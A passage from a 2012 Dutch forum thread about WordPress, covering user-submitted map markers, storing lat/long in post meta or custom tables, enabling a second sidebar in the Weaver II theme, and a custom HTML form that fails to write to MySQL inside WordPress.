Ik wil het eigenlijk lekker simpel houden, een static page met alle markers op een map (die je daarna kunt filteren op basis van categorien) maar dat gebruikers wel relatief simpel een locatie kunnen toevoegen.

Iemand enig idee of dit kan met Wordpress, en of het überhaupt wel het handigste CMS hiervoor is?

De achterliggende management features zijn wel handig, gebruiker beheer, pagina/post beheer enz.
Ja, natuurlijk kan dit. Het toevoegen van een formulier wat gepost kan worden, daarna opgeslagen (als bijvoorbeeld een nieuw post_type met wp_insert_post()) en dat kan daarna weer op een creative manier worden getoond, bijvoorbeeld in een Google Map. Kijk eens naar de complexiteit aan formulieren die je bijvoorbeeld voor elkaar kan krijgen met Gravity Forms. Dat het niet standaard kan, of met een plugin die al bestaat, wil natuurlijk niet zeggen dat het niet kan. :)
geert1 schreef op vrijdag 15 juni 2012 @ 10:03:

Ik denk dat je dit best in een plugin zou kunnen verwerken. Het proces wat je omschrijft is niet ingewikkeld en heeft alleen maar een wrapper functie rondom het weergeven van een afbeelding nodig om het proces in gang te zetten. Dat het niet standaard in de WordPress core zit, wil niet zeggen dat je het niet voor jezelf kunt maken...
Dit ben ik met je eens, de Media Library is de grote Achilleshiel van WordPress. Gelukkig lijkt daar in de release cycle op weg naar 3.5 nu eindelijk de focus op te komen te liggen.

[ Voor 36% gewijzigd door Verwijderd op 30-07-2012 13:27 ]

Acties:
  • 0 Henk 'm!

• De_Bastaard
Verwijderd schreef op maandag 30 juli 2012 @ 13:23:
Hoog tijd dat ik de start post weer eens ga updaten...

[...]

Ja, natuurlijk kan dit. Het toevoegen van een formulier wat gepost kan worden, daarna opgeslagen (als bijvoorbeeld een nieuw post_type met wp_insert_post()) en dat kan daarna weer op een creative manier worden getoond, bijvoorbeeld in een Google Map. Kijk eens naar de complexiteit aan formulieren die je bijvoorbeeld voor elkaar kan krijgen met Gravity Forms. Dat het niet standaard kan, of met een plugin die al bestaat, wil natuurlijk niet zeggen dat het niet kan. :)

[...]

Ik denk dat je dit best in een plugin zou kunnen verwerken. Het proces wat je omschrijft is niet ingewikkeld en heeft alleen maar een wrapper functie rondom het weergeven van een afbeelding nodig om het proces in gang te zetten. Dat het niet standaard in de WordPress core zit, wil niet zeggen dat je het niet voor jezelf kunt maken...

[...]

Dit ben ik met je eens, de Media Library is de grote Achilleshiel van WordPress. Gelukkig lijkt daar in de release cycle op weg naar 3.5 nu eindelijk de focus op te komen te liggen.
Zijn er in WP ook eigenlijk bepaalde "custom" velden die gebruikt worden, of wordt alles gewoon in een standaard kolom gedumpt? Het lijkt me handig dat bijv. informatie als lat/lang niet in een normaal tekst veld geplaatst wordt als je met custom post entries gaat werken.

Acties:
  • 0 Henk 'm!

Verwijderd

Topicstarter
De_Bastaard schreef op dinsdag 31 juli 2012 @ 09:46:
[...]

Zijn er in WP ook eigenlijk bepaalde "custom" velden die gebruikt worden, of wordt alles gewoon in een standaard kolom gedumpt? Het lijkt me handig dat bijv. informatie als lat/lang niet in een normaal tekst veld geplaatst wordt als je met custom post entries gaat werken.
Als je ze in de post meta op wilt slaan dan komen ze allemaal in een zelfde veld (longtext type) terecht. Maar je bent natuurlijk vrij om zelf tabellen aan te maken als je op zo'n manier wilt optimaliseren.

Acties:
  • 0 Henk 'm!

• De_Bastaard
Ja lijkt me opzich wel zo logisch als je van plan bent veel waarden van een bepaald type te gaan gebruiken. Ook om achteraf wat werk te verrichten in MySQL enzo.

Acties:
  • 0 Henk 'm!

• Freeman
Hallo allemaal,

Ik draai al sinds een tijdje een community Wordpress site.
Nu wil ik het 1 en ander gaan veranderen, waar ik jullie hulp bij nodig heb.

Ik draai met de theme Weaver II. Nu dacht ik dat Weaver II zowel een linker als een rechter side bar had, nu blijft uit de praktijk dat ik enkel de linker kant kan benutten, ik wil ook de rechter side bar benutten c.q. enablen.

Weet iemand hier toevallig meer info over? Ik heb internet al zitten raadplegen, maar daar kom ik niet ver mee.
Het betreft de website: *snip* niet relevant */snip* (Links staan widgets), en de rechterkant is onbenut.
Ik gok dat ik de width van de website moet vergroten om vervolgens en nieuwe bar toe te voegen, gelezen via: http://board.zeaks.org/th...with-different-widths.10/

Omdat de topic al verouderd is vraag ik het eerst even hier, kom ik er alsnog niet uit ga ik naar weaver forum.

Gr. Johnny

[ Voor 2% gewijzigd door RobIII op 13-08-2012 19:46 ]

Acties:
  • 0 Henk 'm!

• De_Bastaard
De_Bastaard schreef op dinsdag 31 juli 2012 @ 14:18:
Ja lijkt me opzich wel zo logisch als je van plan bent veel waarden van een bepaald type te gaan gebruiken. Ook om achteraf wat werk te verrichten in MySQL enzo.
Oké, ik loop tegen iets heel raars aan :-)

Ik heb er even voor gekozen om geen aparte plugin te gebruiken of aan te schaffen om een form te maken. Nu ben ik aan de slag geweest om op een static page een form te maken (gewoon HTML code erop gezet via de editor), en in dat form een losse PHP file op te roepen om de data in SQL te krijgen.

Nu heb ik alleen het probleem dat de data niet in SQL terecht komt. Wanneer ik op Submit klik dan geeft Wordpress aan 'oops, problem, cannot find page' maar wanneer ik dezelfde code toepas op een pagina die niet in Wordpress valt (formtest.php), dan werkt het prima.

Ik heb op de page template uiteraard al een include gedaan, maar het enige wat er gebeurt is dat de ID's in SQL wel worden opgehoogd maar dat er geen data wordt gezet in die kolommen.

Hebben jullie al eens externe php ge-include, zoja, hoe ging dat?
Pagina: 1 ... 6 ... 9 Laatste

Let op:
~[html]Dit topic is niet de plaats om te lopen helpdesken. Het WordPress topic is primair bedoeld als discussieplatform, niet als vraagbaak en quickfix desk.~[/html]